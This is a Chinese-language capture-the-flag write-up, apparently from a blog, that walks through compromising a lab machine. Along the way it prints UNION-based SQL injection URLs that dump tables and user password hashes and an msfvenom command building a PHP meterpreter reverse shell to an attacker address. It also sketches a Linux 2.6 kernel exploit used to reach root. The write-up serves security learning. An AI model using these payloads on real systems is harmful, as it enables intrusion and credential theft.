CTF-6

发现目标靶机

image 324 - CTF-6

nmap扫描端口

image 325 - CTF-6

访问80端口 发现sql注入

image 326 1024x249 - CTF-6

查表(http://192.168.15.168/index.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema = 'cms')

image 327 1024x346 - CTF-6

查看user表 http://192.168.15.168/index.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4,5,6,database() from information_schema.columns where table_name = 'user'

image 328 1024x273 - CTF-6

查询字段内容http://192.168.15.168/index.php?id=-1 UNION SELECT 1,hex(user_password),3,4,5,6,database() from cms.user

最终得到的结果

image 329 - CTF-6

使用sqlmap

image 330 1024x297 - CTF-6

登录后台

image 331 1024x495 - CTF-6

发现了一个上传的位置

使用msf反弹shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.15.137 LPOST=4444 -o shell.php

image 332 - CTF-6

使用msf进行侦听并在web端运行shell.php

image 333 - CTF-6

查看Linux版本 版本 为2.6

image 334 - CTF-6

使用kail搜索linux2.6的攻击模块

image 335 - CTF-6

尝试使用第一个攻击脚本进行攻击 将攻击模块复制到tmp目录下 然后使用python打开共享

image 336 - CTF-6

shell段下载脚本

image 337 - CTF-6

给与脚本权限

image 338 - CTF-6

转换脚本格式

image 342 - CTF-6

执行脚本

发现出问题了

image 341 - CTF-6

通过搜索资料发现 运行脚本需要加上运行的进程号

image 343 - CTF-6

恰好568 可以使用

再次运行脚本

image 345 - CTF-6

成功获得root 完

CTF-5

上一篇

FirstBlood

下一篇
评论
发表评论 说点什么
还没有评论